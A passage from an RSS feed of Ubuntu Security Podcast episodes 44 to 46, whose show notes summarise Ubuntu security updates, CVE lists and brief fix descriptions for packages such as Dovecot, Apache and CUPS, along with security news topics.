<li><a href="https://ubuntu.com/security/CVE-2019-15214">CVE-2019-15214</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15212">CVE-2019-15212</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15211">CVE-2019-15211</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15090">CVE-2019-15090</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14763">CVE-2019-14763</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14284">CVE-2019-14284</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14283">CVE-2019-14283</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13631">CVE-2019-13631</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13272">CVE-2019-13272</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13233">CVE-2019-13233</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12984">CVE-2019-12984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12819">CVE-2019-12819</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12818">CVE-2019-12818</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11884">CVE-2019-11884</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11833">CVE-2019-11833</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11815">CVE-2019-11815</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11810">CVE-2019-11810</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11599">CVE-2019-11599</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11487">CVE-2019-11487</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11085">CVE-2019-11085</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10639">CVE-2019-10639</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10638">CVE-2019-10638</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10207">CVE-2019-10207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10126">CVE-2019-10126</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0136">CVE-2019-0136</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-5383">CVE-2018-5383</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20856">CVE-2018-20856</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20784">CVE-2018-20784</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20169">CVE-2018-20169</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19985">CVE-2018-19985</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16862">CVE-2018-16862</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14617">CVE-2018-14617</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14613">CVE-2018-14613</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14612">CVE-2018-14612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14611">CVE-2018-14611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14610">CVE-2018-14610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14609">CVE-2018-14609</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14616">CVE-2018-14616</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14615">CVE-2018-14615</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14614">CVE-2018-14614</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13100">CVE-2018-13100</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13099">CVE-2018-13099</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13098">CVE-2018-13098</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13097">CVE-2018-13097</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13096">CVE-2018-13096</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13093">CVE-2018-13093</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13053">CVE-2018-13053</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-3934-2-policykit-vulnerability-10-36">[<a href="https://usn.ubuntu.com/3934-2/">USN-3934-2</a>] PolicyKit vulnerability [10:36]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-6133">CVE-2019-6133</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-27/">Episode 27</a> - PolicyKit could get confused via PID reuse - fix was 2
parts - 1 kernel to ensure can&rsquo;t race kernel on PID assignment, and
second was in PolicyKit itself to check on PID, UID and start time.</li>
</ul>
<h3 id="usn-4119-1-irssi-vulnerability-11-23">[<a href="https://usn.ubuntu.com/4119-1/">USN-4119-1</a>] Irssi vulnerability [11:23]</h3>
<ul>
<li>1 CVEs addressed in Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15717">CVE-2019-15717</a> <!-- raw HTML omitted -->
<ul>
<li>UAF if server sends two CAP commands (used by client and server to negotiate
capabilities - ie sasl support etc)</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-4121-1-samba-vulnerability-11-52">[<a href="https://usn.ubuntu.com/4121-1/">USN-4121-1</a>] Samba vulnerability [11:52]</h3>
<ul>
<li>1 CVEs addressed in Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-10197">CVE-2019-10197</a> <!-- raw HTML omitted -->
<ul>
<li>Possible directory share escape by unauthenticated users - allows
attackers to gain access to the host filesystem outside the share
root (limited as per underlying file-system permissions)</li>
<li>Needs the server to have explicitly enabled &lsquo;wide links&rsquo; and not be
using &lsquo;unix extensions&rsquo; OR to have also set &lsquo;allow insecure wide
links&rsquo;</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-4120-1-systemd-vulnerability-12-40">[<a href="https://usn.ubuntu.com/4120-1/">USN-4120-1</a>] systemd vulnerability [12:40]</h3>
<ul>
<li>1 CVEs addressed in Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15718">CVE-2019-15718</a> <!-- raw HTML omitted -->
<ul>
<li>systemd-resolved failed to properly setup access controls on its DBus
server socket, whic allows unprivileged users to execute DBus methods
that should only be executable by privileged users - such as changing
the systems DNS resolver settings</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-4122-1-firefox-vulnerabilities-13-10">[<a href="https://usn.ubuntu.com/4122-1/">USN-4122-1</a>] Firefox vulnerabilities [13:10]</h3>
<ul>
<li>17 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11747">CVE-2019-11747</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11741">CVE-2019-11741</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9812">CVE-2019-9812</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11752">CVE-2019-11752</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11750">CVE-2019-11750</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11749">CVE-2019-11749</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11748">CVE-2019-11748</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11746">CVE-2019-11746</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11744">CVE-2019-11744</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11743">CVE-2019-11743</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11742">CVE-2019-11742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11740">CVE-2019-11740</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11738">CVE-2019-11738</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11737">CVE-2019-11737</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11735">CVE-2019-11735</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11734">CVE-2019-11734</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-5849">CVE-2019-5849</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Upstream Firefox 69.0 release
<ul>
<li><a href="https://www.mozilla.org/en-US/security/advisories/mfsa2019-25/">https://www.mozilla.org/en-US/security/advisories/mfsa2019-25/</a></li>
</ul>
</li>
</ul>
<h3 id="usn-4123-1-npm-fstream-vulnerability-13-29">[<a href="https://usn.ubuntu.com/4123-1/">USN-4123-1</a>] npm/fstream vulnerability [13:29]</h3>
<ul>
<li>1 CVEs addressed in Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-13173">CVE-2019-13173</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-and-alex-discuss-hacking-bmcs-via-a-remote-usn-attack-13-53">Joe and Alex discuss hacking BMCs via a remote USN attack [13:53]</h3>
<ul>
<li><a href="https://thehackernews.com/2019/09/hacking-bmc-server.html">https://thehackernews.com/2019/09/hacking-bmc-server.html</a></li>
</ul>
<h3 id="joe-and-alex-also-discuss-password-stashes-20-33">Joe and Alex also discuss password stashes [20:33]</h3>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E046.mp3" length="24762945" type="audio/mpeg" /><itunes:duration>25:47</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 45
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-45/</link>
          <pubDate>Wed, 04 Sep 2019 21:25:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>f87b82df55da7b039ccf147c10a94c759ed46cab8a843d0e81c042222ce3f8373cf1abe1587107675c11187a834f6d5550da0e76ae338343ad75f1161c036ee5</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 45</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we look at security updates for Dovecot, Ghostscript, a livepatch update for the Linux kernel, Ceph and Apache, plus Alex and Joe discuss recent Wordpress plugin vulnerabilities and the Hostinger breach, and more.
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we look at security updates for Dovecot, Ghostscript, a livepatch update for the Linux kernel, Ceph and Apache, plus Alex and Joe discuss recent Wordpress plugin vulnerabilities and the Hostinger breach, and more.</itunes:summary>
        <description>This week we look at security updates for Dovecot, Ghostscript, a livepatch update for the Linux kernel, Ceph and Apache, plus Alex and Joe discuss recent Wordpress plugin vulnerabilities and the Hostinger breach, and more.</description>
        <googleplay:description>This week we look at security updates for Dovecot, Ghostscript, a livepatch update for the Linux kernel, Ceph and Apache, plus Alex and Joe discuss recent Wordpress plugin vulnerabilities and the Hostinger breach, and more.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at security updates for Dovecot, Ghostscript, a livepatch update for the Linux kernel, Ceph and Apache, plus Alex and Joe discuss recent Wordpress plugin vulnerabilities and the Hostinger breach, and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>22 unique CVEs addressed</p>
<h3 id="usn-4110-1-usn-4110-2-dovecot-vulnerability-00-52">[<a href="https://usn.ubuntu.com/4110-1/">USN-4110-1</a>, <a href="https://usn.ubuntu.com/4110-2/">USN-4110-2</a>] Dovecot vulnerability [00:52]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11500">CVE-2019-11500</a></li>
</ul>
</li>
<li>IMAP and ManageSieve protocol parsers would not check for embedded NUL bytes in strings
<ul>
<li>When parsing these strings, would return indexes outside the normal
string bounds as the first character which needed unescaping</li>
<li>Would then go and try to unescape the string from this index, which
rewrites the string on the fly, and so would then go and rewrite
outside the bounds of the string</li>
<li>Fixed to disallow embedded NUL bytes AND to not try and skip up to
first unescaped character but instead loop over the whole string in
unescaping</li>
</ul>
</li>
</ul>
<h3 id="usn-4110-3-usn-4110-4-dovecot-regression-02-08">[<a href="https://usn.ubuntu.com/4110-3/">USN-4110-3</a>, USN-4110-4] Dovecot regression [02:08]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11500">CVE-2019-11500</a></li>
</ul>
</li>
<li>Original patch used pre-release version of the fix from upstream which
contained an error such that the checking of NUL bytes was skipped -
re-released with correct final upstream fix</li>
</ul>
<h3 id="lsn-0054-1-linux-kernel-vulnerability-02-38">[<a href="https://lists.ubuntu.com/archives/ubuntu-security-announce/2019-August/005085.html">LSN-0054-1</a>] Linux kernel vulnerability [02:38]</h3>
<ul>
<li>9 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-1129">CVE-2018-1129</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13272">CVE-2019-13272</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12984">CVE-2019-12984</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12819">CVE-2019-12819</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12818">CVE-2019-12818</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12614">CVE-2019-12614</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10126">CVE-2019-10126</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3846">CVE-2019-3846</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2101">CVE-2019-2101</a></li>
</ul>
</li>
<li>Livepatch for CVEs addressed in regular kernel updates (<a href="https://ubuntusecuritypodcast.org/episode-43/">Episode 43</a>)
<ul>
<li>ptrace credentials race, Marvell Wifi heap-buffer overflows, NULL
pointer dereferences</li>
</ul>
</li>
</ul>
<h3 id="usn-4111-1-ghostscript-vulnerabilities-03-20">[<a href="https://usn.ubuntu.com/4111-1/">USN-4111-1</a>] Ghostscript vulnerabilities [03:20]</h3>
<ul>
<li>4 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14817">CVE-2019-14817</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14813">CVE-2019-14813</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14812">CVE-2019-14812</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14811">CVE-2019-14811</a></li>
</ul>
</li>
<li>Four more -dSAFER sandbox bypasses (see <a href="https://ubuntusecuritypodcast.org/episode-43/">Episode 43</a> for the last one)</li>
<li>All variations on the theme of using the .forceput operator to escape the
sandbox</li>
</ul>
<h3 id="usn-4112-1-ceph-vulnerability-04-01">[<a href="https://usn.ubuntu.com/4112-1/">USN-4112-1</a>] Ceph vulnerability [04:01]</h3>
<ul>
<li>1 CVEs addressed in Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-10222">CVE-2019-10222</a></li>
</ul>
</li>
<li>DoS - unauthenticated clients can crash the rados gateway by
disconnecting at certain time (triggering a NULL pointer deference when
looking up the remote address for a connected client)
<ul>
<li>Older versions are not affected since this is in the beast RGW
frontend - which is not in the versions in trusty / xenial - and only
in the bionic version as an experimental feature</li>
</ul>
</li>
</ul>
<h3 id="usn-4113-1-apache-http-server-vulnerabilities-04-41">[<a href="https://usn.ubuntu.com/4113-1/">USN-4113-1</a>] Apache HTTP Server vulnerabilities [04:41]</h3>
<ul>
<li>
<p>7 CVEs addressed in Xenial, Bionic, Disco</p>
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9517">CVE-2019-9517</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10098">CVE-2019-10098</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10097">CVE-2019-10097</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10092">CVE-2019-10092</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10082">CVE-2019-10082</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-10081">CVE-2019-10081</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-0197">CVE-2019-0197</a></li>
</ul>
</li>
<li>
<p>HTTP/2 DoS issue (Internal Data Buffering) - <a href="https://ubuntusecuritypodcast.org/episode-43/">Episode 43</a> for nginx</p>
<ul>
<li><a href="https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/http2">https://wiki.ubuntu.com/SecurityTeam/KnowledgeBase/http2</a></li>
</ul>
</li>
<li>
<p>Open redirect in mod_rewrite if have self-referential redirects</p>
</li>
<li>
<p>Stack buffer overflow + NULL pointer dereference in mod_remoteip</p>
</li>
<li>
<p>Possible XSS in mod_proxy where the link shown on error pages could be
controlled by an attacker - but only possible where configured with
proxying enable but misconfigured so that Proxy Error page is shown.</p>
</li>
<li>
<p>UAF (read) during HTTP/2 connection shutdown</p>
</li>
<li>
<p>HTTP/2 push - allows server to send resources to a client before it
requests them - could overwrite memory of the server&rsquo;s request pool -
this is preconfigured and not under control of client but could cause a
crash etc.</p>
</li>
<li>
<p>HTTP/2 upgrade - can configure to automatically upgrade HTTP/1.1 requests
to HTTP/2 - but if this was not the first request on the connection could
lead to crash</p>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="alex-and-joe-talk-wordpress-plugin-vulnerabiliies-and-hostinger-password-breach-07-03">Alex and Joe talk Wordpress plugin vulnerabiliies and Hostinger password breach [07:03]</h3>
<ul>
<li><a href="https://threatpost.com/wordpress-plugins-exploited-in-ongoing-attack-researchers-warn/147671/">https://threatpost.com/wordpress-plugins-exploited-in-ongoing-attack-researchers-warn/147671/</a></li>
<li><a href="https://www.zdnet.com/article/hostinger-resets-customer-passwords-after-security-incident/">https://www.zdnet.com/article/hostinger-resets-customer-passwords-after-security-incident/</a></li>
<li><a href="https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2009/july/if-youre-typing-the-letters-a-e-s-into-your-code-youre-doing-it-wrong/">https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2009/july/if-youre-typing-the-letters-a-e-s-into-your-code-youre-doing-it-wrong/</a></li>
</ul>
<h3 id="openssl-1-dot-1-dot-1-with-tls-1-dot-3-support-complete-for-ubuntu-18-dot-04-lts--bionic--17-29">OpenSSL 1.1.1 with TLS 1.3 support complete for Ubuntu 18.04 LTS (Bionic) [17:29]</h3>
<ul>
<li>OpenSSL upgraded to version 1.1.1 in Ubuntu 18.04 LTS - supports TLS
1.3 - now published via -updates and -security</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E045.mp3" length="18353541" type="audio/mpeg" /><itunes:duration>19:07</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 44
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-44/</link>
          <pubDate>Mon, 26 Aug 2019 20:35:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>b063c8dc343daa4078e95f9f481e32335d9acfce6b4aa70e39b53c044e987477a3e4e9e7a7a70b704240207adb256105eab6f6cd98339f76d818885c695cf7e0</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 44</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week Joe and Alex discuss a recently disclosed backdoor in Webmin, plus we cover security updates from the past week, including for Nova, KDE, LibreOffice, Docker, CUPS and more.
        
        ]]></itunes:subtitle>
        <itunes:summary>This week Joe and Alex discuss a recently disclosed backdoor in Webmin, plus we cover security updates from the past week, including for Nova, KDE, LibreOffice, Docker, CUPS and more.</itunes:summary>
        <description>This week Joe and Alex discuss a recently disclosed backdoor in Webmin, plus we cover security updates from the past week, including for Nova, KDE, LibreOffice, Docker, CUPS and more.</description>
        <googleplay:description>This week Joe and Alex discuss a recently disclosed backdoor in Webmin, plus we cover security updates from the past week, including for Nova, KDE, LibreOffice, Docker, CUPS and more.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week Joe and Alex discuss a recently disclosed backdoor in Webmin, plus we cover security updates from the past week, including for Nova, KDE, LibreOffice, Docker, CUPS and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>21 unique CVEs addressed</p>
<h3 id="usn-4100-1-kconfig-and-kde-libraries-vulnerabilities-00-46">[<a href="https://usn.ubuntu.com/4100-1/">USN-4100-1</a>] KConfig and KDE libraries vulnerabilities [00:46]</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2016-6232">CVE-2016-6232</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14744">CVE-2019-14744</a></li>
</ul>
</li>
<li>Directory traversal in KArchive via ../</li>
<li>RCE via malicious .desktop file - contianed extra functionality outside
of XDG spec, where could contain shell commands that would get expanded -
so if you view a .desktop file in Dolphin, and the Icon property
contained shell commands, this would get evaluated - so wouldn&rsquo;t need to
interact at all - upstream now removed this &lsquo;feature&rsquo;</li>
</ul>
<h3 id="usn-4102-1-libreoffice-vulnerabilities-02-45">[<a href="https://usn.ubuntu.com/4102-1/">USN-4102-1</a>] LibreOffice vulnerabilities [02:45]</h3>
<ul>
<li>3 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9852">CVE-2019-9852</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9851">CVE-2019-9851</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9850">CVE-2019-9850</a></li>
</ul>
</li>
<li>Docs can have macros &amp; scripts on action - document-open, mouse-over
<ul>
<li>Should only be for scripts shipped in libreoffice itself</li>
<li>Path bypass in CVE-2018-16858 - so added more protections</li>
<li>Could be bypassed again with URL encoding - so fix again</li>
</ul>
</li>
<li>Second LibreLogo issue (<a href="https://ubuntusecuritypodcast.org/episode-40/">Episode 40</a>) - could bypass previous protections
again - was fixed upstream but found to still be inadequate - hence 2
CVEs for this (incomplete fix the first time around)</li>
</ul>
<h3 id="usn-4078-2-openldap-vulnerabilities-04-26">[<a href="https://usn.ubuntu.com/4078-2/">USN-4078-2</a>] OpenLDAP vulnerabilities [04:26]</h3>
<ul>
<li>2 CVEs addressed in Precise ESM, Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-13565">CVE-2019-13565</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-13057">CVE-2019-13057</a></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-41/">Episode 41</a> for regular releases - now ESM as well</li>
</ul>
<h3 id="usn-4103-1-usn-4103-2-docker-credential-helpers-and-docker-vulnerabilities-04-52">[<a href="https://usn.ubuntu.com/4103-1/">USN-4103-1</a>, <a href="https://usn.ubuntu.com/4103-2/">USN-4103-2</a>] docker-credential-helpers and Docker vulnerabilities [04:52]</h3>
<ul>
<li>1 CVEs addressed in Disco (docker-credential-helpers)</li>
<li>1 CVEs addressed in Xenial, Bionic, Disco (docker)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-1020014">CVE-2019-1020014</a></li>
</ul>
</li>
<li>golang-docker-credentials package had a double-free which could be
triggered via a local user -&gt; crash, DoS</li>
<li>Bundled with docker.io package so update both</li>
</ul>
<h3 id="usn-4104-1-nova-vulnerability-05-28">[<a href="https://usn.ubuntu.com/4104-1/">USN-4104-1</a>] Nova vulnerability [05:28]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14433">CVE-2019-14433</a></li>
</ul>
</li>
<li>API requests which end in fault conditions from authenticated users could
result in keys or other details being leaked / returned in responses to
further API requests (not just any error / fault but say if tried to
hard-reboot and this fails) - fixed to sanitize any possible details out
of faults</li>
</ul>
<h3 id="usn-4105-1-cups-vulnerabilities-06-30">[<a href="https://usn.ubuntu.com/4105-1/">USN-4105-1</a>] CUPS vulnerabilities [06:30]</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-8675">CVE-2019-8675</a></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8696">CVE-2019-8696</a></li>
</ul>
</li>
<li>SNMP backend - parses ASN.1 encoded data - can be used to automatically
get status from printers etc - would not do bounds checking on actual
encoded ASN.1 data vs the description of it - so could easily get a stack
buffer overflow - fixed to add bounds checking</li>
<li>Also includes some other upstream fixes for potential security issues
(without CVEs), including a CPU based DoS if a cups client unexpectedly
disconnected</li>
</ul>
<h3 id="usn-4106-1-nltk-vulnerability-07-37">[<a href="https://usn.ubuntu.com/4106-1/">USN-4106-1</a>] NLTK vulnerability [07:37]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-14751">CVE-2019-14751</a></li>
</ul>
</li>
<li>Python Natural Language Toolkit - downloads datasets as ZIP compressed</li>
<li>Mike Salvatore - ZipSlip</li>
<li><a href="https://salvatoresecurity.com/zip-slip-in-nltk-cve-2019-14751/">https://salvatoresecurity.com/zip-slip-in-nltk-cve-2019-14751/</a></li>
<li>Fixed to use inbuilt python zipfile handling to unzip rather than custom
implementation</li>
</ul>
<h3 id="usn-4107-1-giflib-vulnerabilities-08-35">[<a href="https://usn.ubuntu.com/4107-1/">USN-4107-1</a>] GIFLIB vulnerabilities [08:35]</h3>
<ul>
<li>3 CVEs addressed in Xenial, Bionic, Disco
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15133">CVE-2019-15133</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11490">CVE-2018-11490</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-3977">CVE-2016-3977</a></li>
</ul>
</li>
<li>Common library used for handling GIF images (openjdk, ffmpeg, gstreamer, kde)</li>
<li>Divide-by-zero</li>
<li>2 different heap based buffer overflows - one was originally fixed in
Debian but the patch for it got dropped in a later release - so we have
repatched that</li>
</ul>
<h3 id="usn-4108-1-zstandard-vulnerability-09-20">[<a href="https://usn.ubuntu.com/4108-1/">USN-4108-1</a>] Zstandard vulnerability [09:20]</h3>
<ul>
<li>1 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11922">CVE-2019-11922</a></li>
</ul>
</li>
<li>Common library (maintained by Facebook) for handling the zstd compression algorithm</li>
<li>Race condition when using single-pass compression, might allow attacker
to get OOB write IF the caller had provided a smaller output buffer than
the recommended size</li>
<li>So likely won&rsquo;t affect all packages which use zstd (there are many) -
should always follow best practice</li>
</ul>
<h3 id="usn-4109-1-openjpeg-vulnerabilities-10-11">[<a href="https://usn.ubuntu.com/4109-1/">USN-4109-1</a>] OpenJPEG vulnerabilities [10:11]</h3>
<ul>
<li>5 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-6616">CVE-2018-6616</a></li>
